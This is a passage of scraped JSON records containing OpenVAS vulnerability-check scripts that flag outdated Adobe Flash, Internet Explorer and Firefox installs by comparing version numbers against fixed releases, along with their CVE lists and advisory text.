See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810668\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:54 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption 
vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:55", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", 
"CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807654", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-Linux\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807654\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:46 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", 
value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.616 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.616 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.616\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.616\");\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:51:39", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS15-065.", "cvss3": {}, "published": "2015-07-15T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2391", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-1729", "CVE-2015-2404", "CVE-2015-2403", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", 
"CVE-2015-2398", "CVE-2015-2425", "CVE-2015-2411", "CVE-2015-1733", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2406", "CVE-2015-2421", "CVE-2015-2389"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310805720", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805720", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805720\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-1729\", \"CVE-2015-1733\", \"CVE-2015-1767\", \"CVE-2015-2372\",\n \"CVE-2015-2383\", \"CVE-2015-2384\", \"CVE-2015-2385\", \"CVE-2015-2389\",\n \"CVE-2015-2390\", \"CVE-2015-2391\", \"CVE-2015-2397\", \"CVE-2015-2398\",\n \"CVE-2015-2401\", \"CVE-2015-2402\", \"CVE-2015-2403\", \"CVE-2015-2404\",\n \"CVE-2015-2388\", \"CVE-2015-2406\", \"CVE-2015-2408\", \"CVE-2015-2410\",\n \"CVE-2015-2411\", \"CVE-2015-2412\", \"CVE-2015-2413\", \"CVE-2015-2414\",\n \"CVE-2015-2419\", \"CVE-2015-2421\", \"CVE-2015-2422\", \"CVE-2015-2425\",\n \"CVE-2015-1738\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-15 12:14:36 +0530 (Wed, 15 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS15-065.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper\n handling memory objects when accessing it and does not properly validate\n permissions under specific 
conditions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to corrupt memory and potentially execute arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x/10.x/11.x and VBScript 5.8 on 8.x/9.x/10.x/11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3065822\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS15-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win2012:1,\n win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([6-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5662\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21480\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23706\")){\n 
security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19420\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.23000\", test_version2:\"7.0.6002.23727\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19651\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23706\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16668\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20783\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.17000\", test_version2:\"8.0.7601.18895\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.22000\", test_version2:\"8.0.7601.23098\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16668\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20783\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17411\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.21000\", test_version2:\"10.0.9200.21522\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.00000\", test_version2:\"11.0.9600.17914\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8:1, win2012:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17411\")||\n version_in_range(version:dllVer, 
test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.21522\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"11.0.9600.17905\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:04:39", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5451", "CVE-2017-5462", "CVE-2017-5436", "CVE-2016-1019", "CVE-2017-5441", "CVE-2017-5442", "CVE-2017-5446", "CVE-2017-5434", "CVE-2017-5465", "CVE-2016-6354", "CVE-2017-5429", "CVE-2017-5440", "CVE-2017-5458", "CVE-2017-5435", "CVE-2017-5432", "CVE-2017-5469", "CVE-2017-5455", "CVE-2017-5438", "CVE-2017-5439", "CVE-2017-5445", "CVE-2017-5450", "CVE-2017-5433", "CVE-2017-5447", "CVE-2017-5466", "CVE-2017-5444", "CVE-2017-5467", "CVE-2017-5460", "CVE-2017-5449", "CVE-2017-5454", "CVE-2017-5461", "CVE-2017-5437", "CVE-2017-5456", "CVE-2017-5453", "CVE-2017-5468", "CVE-2017-5430", "CVE-2017-5463", "CVE-2017-5452", "CVE-2017-5448", "CVE-2017-5459", "CVE-2017-5443", "CVE-2017-5464"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810752", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810752", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810752\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5433\", \"CVE-2017-5435\", \"CVE-2017-5436\", \"CVE-2017-5461\",\n\"CVE-2017-5459\", \"CVE-2017-5466\", \"CVE-2017-5434\", \"CVE-2017-5432\",\n\"CVE-2017-5460\", \"CVE-2017-5438\", \"CVE-2017-5439\", \"CVE-2017-5440\",\n\"CVE-2017-5441\", \"CVE-2017-5442\", \"CVE-2017-5464\", \"CVE-2017-5443\",\n\"CVE-2017-5444\", \"CVE-2017-5446\", \"CVE-2017-5447\", \"CVE-2017-5465\",\n\"CVE-2017-5448\", \"CVE-2017-5437\", \"CVE-2016-1019\", \"CVE-2017-5454\",\n\"CVE-2017-5455\", \"CVE-2017-5456\", \"CVE-2017-5469\", \"CVE-2016-6354\",\n\"CVE-2017-5445\", \"CVE-2017-5449\", \"CVE-2017-5450\", \"CVE-2017-5451\",\n\"CVE-2017-5462\", \"CVE-2017-5463\", \"CVE-2017-5467\", \"CVE-2017-5452\",\n\"CVE-2017-5453\", \"CVE-2017-5458\", \"CVE-2017-5468\", \"CVE-2017-5430\",\n\"CVE-2017-5429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n 
script_tag(name:\"creation_date\", value:\"2017-04-20 10:53:42 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An use-after-free in SMIL animation functions,\n\n - An use-after-free during transaction processing in the editor,\n\n - An uut-of-bounds write with malicious font in Graphite 2,\n\n - An Out-of-bounds write in Base64 encoding in NSS,\n\n - The buffer overflow in WebGL,\n\n - The origin confusion when reloading isolated data:text/html URL,\n\n - An use-after-free during focus handling,\n\n - An use-after-free in text input selection,\n\n - An use-after-free in frame selection,\n\n - An use-after-free in nsAutoPtr during XSLT processing,\n\n - An use-after-free in nsTArray Length() during XSLT processing,\n\n - An use-after-free in txExecutionState destructor during XSLT processing,\n\n - An use-after-free with selection during scroll events,\n\n - An use-after-free during style changes,\n\n - The memory corruption with accessibility and DOM manipulation,\n\n - The out-of-bounds write during BinHex decoding,\n\n - The buffer overflow while parsing application/http-index-format content,\n\n - An out-of-bounds read when HTTP/2 DATA frames are sent with incorrect data,\n\n - An out-of-bounds read during glyph processing,\n\n - An out-of-bounds read in ConvolvePixel,\n\n - An out-of-bounds write in ClearKeyDecryptor,\n\n - The vulnerabilities in Libevent library,\n\n - The sandbox escape allowing file system read access through file picker,\n\n - The sandbox escape through internal feed reader APIs,\n\n - The sandbox escape allowing local file system access,\n\n - The Potential 
Buffer overflow in flex-generated code,\n\n - An uninitialized values used while parsing application/http-index-format content,\n\n - The crash during bidirectional unicode manipulation with animation,\n\n - An addressbar spoofing using javascript: URI on Firefox for Android,\n\n - An addressbar spoofing with onblur event,\n\n - The DRBG flaw in NSS,\n\n - The memory corruption when drawing Skia content,\n\n - The addressbar spoofing during scrolling with editable content on Firefox for Android,\n\n - The HTML injection into RSS Reader feed preview page through TITLE element,\n\n - The drag and drop of javascript: URLs can allow for self-XSS,\n\n - An incorrect ownership model for Private Browsing information and\n\n - The memory safety bugs fixed in Firefox 53 and Firefox ESR 52.1.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, to delete arbitrary files by leveraging\n certain local file execution, to obtain sensitive information, and to cause\n a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before\n 53.0 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 53.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"53.0\"))\n{\n report = 
report_fixed_ver(installed_version:ffVer, fixed_version:\"53.0\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:08:00", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5451", "CVE-2017-5462", "CVE-2017-5436", "CVE-2016-1019", "CVE-2017-5441", "CVE-2017-5442", "CVE-2017-5446", "CVE-2017-5434", "CVE-2017-5465", "CVE-2016-6354", "CVE-2017-5429", "CVE-2017-5440", "CVE-2017-5458", "CVE-2017-5435", "CVE-2017-5432", "CVE-2017-5469", "CVE-2017-5455", "CVE-2017-5438", "CVE-2017-5439", "CVE-2017-5445", "CVE-2017-5450", "CVE-2017-5433", "CVE-2017-5447", "CVE-2017-5466", "CVE-2017-5444", "CVE-2017-5467", "CVE-2017-5460", "CVE-2017-5449", "CVE-2017-5454", "CVE-2017-5461", "CVE-2017-5437", "CVE-2017-5456", "CVE-2017-5453", "CVE-2017-5468", "CVE-2017-5430", "CVE-2017-5463", "CVE-2017-5452", "CVE-2017-5448", "CVE-2017-5459", "CVE-2017-5443", "CVE-2017-5464"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810751", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810751", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810751\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5433\", \"CVE-2017-5435\", \"CVE-2017-5436\", \"CVE-2017-5461\",\n \"CVE-2017-5459\", \"CVE-2017-5466\", \"CVE-2017-5434\", \"CVE-2017-5432\",\n \"CVE-2017-5460\", \"CVE-2017-5438\", \"CVE-2017-5439\", \"CVE-2017-5440\",\n \"CVE-2017-5441\", \"CVE-2017-5442\", \"CVE-2017-5464\", \"CVE-2017-5443\",\n \"CVE-2017-5444\", \"CVE-2017-5446\", \"CVE-2017-5447\", \"CVE-2017-5465\",\n \"CVE-2017-5448\", \"CVE-2017-5437\", \"CVE-2016-1019\", \"CVE-2017-5454\",\n \"CVE-2017-5455\", \"CVE-2017-5456\", \"CVE-2017-5469\", \"CVE-2016-6354\",\n \"CVE-2017-5445\", \"CVE-2017-5449\", \"CVE-2017-5450\", \"CVE-2017-5451\",\n \"CVE-2017-5462\", \"CVE-2017-5463\", \"CVE-2017-5467\", \"CVE-2017-5452\",\n \"CVE-2017-5453\", \"CVE-2017-5458\", \"CVE-2017-5468\", \"CVE-2017-5430\",\n \"CVE-2017-5429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 10:53:01 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An use-after-free in SMIL animation functions,\n\n - An use-after-free during transaction processing in the editor,\n\n - An uut-of-bounds write with malicious font in Graphite 2,\n\n - An Out-of-bounds write in Base64 encoding in NSS,\n\n - The buffer overflow in WebGL,\n\n - The origin confusion when reloading isolated data:text/html URL,\n\n - An use-after-free during focus handling,\n\n - An use-after-free in text input selection,\n\n - An use-after-free in frame selection,\n\n - An use-after-free in nsAutoPtr during XSLT processing,\n\n - An use-after-free in nsTArray Length() during XSLT processing,\n\n - An use-after-free in txExecutionState destructor during XSLT processing,\n\n - An use-after-free with selection during scroll events,\n\n - An use-after-free during style changes,\n\n - The memory corruption with accessibility and DOM manipulation,\n\n - The out-of-bounds write during BinHex decoding,\n\n - The buffer overflow while parsing application/http-index-format content,\n\n - An out-of-bounds read when HTTP/2 DATA frames are sent with incorrect data,\n\n - An out-of-bounds read during glyph processing,\n\n - An out-of-bounds read in ConvolvePixel,\n\n - An out-of-bounds write in ClearKeyDecryptor,\n\n - The vulnerabilities in Libevent library,\n\n - The sandbox escape allowing file system read access through file picker,\n\n - The sandbox escape through internal feed reader APIs,\n\n - The sandbox escape allowing local file system access,\n\n - The Potential Buffer overflow in flex-generated code,\n\n - An uninitialized values used while parsing application/http-index-format content,\n\n - The crash during bidirectional unicode manipulation with animation,\n\n - An addressbar spoofing using javascript: URI on Firefox for Android,\n\n - An addressbar spoofing with onblur event,\n\n - The DRBG flaw 
